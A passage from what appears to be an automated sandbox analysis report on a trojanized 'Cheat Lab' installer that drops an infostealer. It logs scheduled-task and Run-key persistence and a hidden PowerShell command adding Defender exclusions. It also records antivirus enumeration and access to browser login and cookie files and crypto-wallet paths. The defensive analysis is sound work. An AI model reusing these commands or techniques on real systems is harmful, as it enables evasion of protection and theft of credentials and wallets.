                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBD45.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBF2F.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID76E.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBE81.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBDB3.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAEC5.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICA9B.tmp
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | File created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID74E.tmp

                    Boot Survival

                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJIT
                    Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Installer\MSIC01A.tmp | Process information set: NOGPFAULTERRORBOX
                    Source: C:\Windows\Installer\MSIC01A.tmp | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5220 Thread sleep count: 6040 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5220 Thread sleep count: 2984 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6376 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 2700 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 2052 Thread sleep count: 65 > 30
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 2052 Thread sleep count: 4347 > 30
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe TID: 1992 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6040
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2984
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Window / User API: threadDelayed 4347
                    Source: C:\Windows\Installer\MSIC01A.tmp Check user administrative privileges: GetTokenInformation,DecisionNodes graph_6-33667
                    Source: C:\Windows\Installer\MSIC01A.tmp API coverage: 5.9 %
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAEF5.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC8E.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC5E.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIBE32.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAD1D.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIACBE.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIBE12.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAC3E.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIBDB3.tmp
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAEC5.tmp
                    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID74E.tmp
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_08128DF2 sldt word ptr [eax]
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe API call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                    Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F6AF79 FindFirstFileExW
                    Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_00408000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F62DCC mov ecx, dword ptr fs:[00000030h]
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F6AD78 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_00408000 mov edx, dword ptr fs:[00000030h]
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F3D0A5 IsDebuggerPresent,OutputDebugStringW
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F32310 GetProcessHeap
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_0815BB18 LdrInitializeThunk
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Memory allocated: page read and write | page guard
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F533A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F5353F SetUnhandledExceptionFilter
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F52968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F56E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: 9_2_00007FF738ADD9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: 9_2_00007FF738ADDBB8 SetUnhandledExceptionFilter
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: 9_2_00007FF738ADD0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: 9_2_00007FF738B08900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: 18_2_00007FF6FE07DBB8 SetUnhandledExceptionFilter
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: 18_2_00007FF6FE07D9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: 18_2_00007FF6FE07D0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: 18_2_00007FF6FE0A8900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_00402E36 SetUnhandledExceptionFilter
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_00403CF1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_004042F5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 22_2_0040635F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: C:\Windows\Installer\MSIC01A.tmp Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat"
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: 6_2_00F352F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: EnumSystemLocalesW,6_2_00F6E0C6
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: EnumSystemLocalesW,6_2_00F6E1AC
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: EnumSystemLocalesW,6_2_00F67132
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: EnumSystemLocalesW,6_2_00F6E111
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00F6E237
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetLocaleInfoEx,6_2_00F523F8
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetLocaleInfoW,6_2_00F6E48A
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00F6E5B3
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetLocaleInfoW,6_2_00F6E6B9
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetLocaleInfoW,6_2_00F676AF
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00F6E788
                    Source: C:\Windows\Installer\MSIC01A.tmp Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00F6DE24
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: try_get_function,GetLocaleInfoW,9_2_00007FF738B09934
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,9_2_00007FF738B1A03C
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: EnumSystemLocalesW,9_2_00007FF738B092FC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00007FF738B1AA70
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: EnumSystemLocalesW,9_2_00007FF738B1A388
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: EnumSystemLocalesW,9_2_00007FF738B1A458
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_00007FF738B1A894
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,18_2_00007FF6FE0BA03C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: try_get_function,GetLocaleInfoW,18_2_00007FF6FE0A9934
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: EnumSystemLocalesW,18_2_00007FF6FE0A92FC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF6FE0BAA70
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00007FF6FE0BA894
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: EnumSystemLocalesW,18_2_00007FF6FE0BA388
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe Code function: EnumSystemLocalesW,18_2_00007FF6FE0BA458
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: GetLocaleInfoA,22_2_00406EFC
                    Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F535A9 cpuid 6_2_00F535A9
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F537D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00F537D5
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F67B1F GetTimeZoneInformation,6_2_00F67B1F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: connect.exe, 00000016.00000003.2108521517.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107771708.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107871352.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107590031.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107658316.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107985123.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2108436153.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2108353413.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107521201.00000000081DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 22.2.connect.exe.460000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: connect.exe PID: 4584, type: MEMORYSTR
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: JaxxE#
                    Source: connect.exe, 00000016.00000002.2145649555.00000000081FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*F9
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum\walletsLR
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
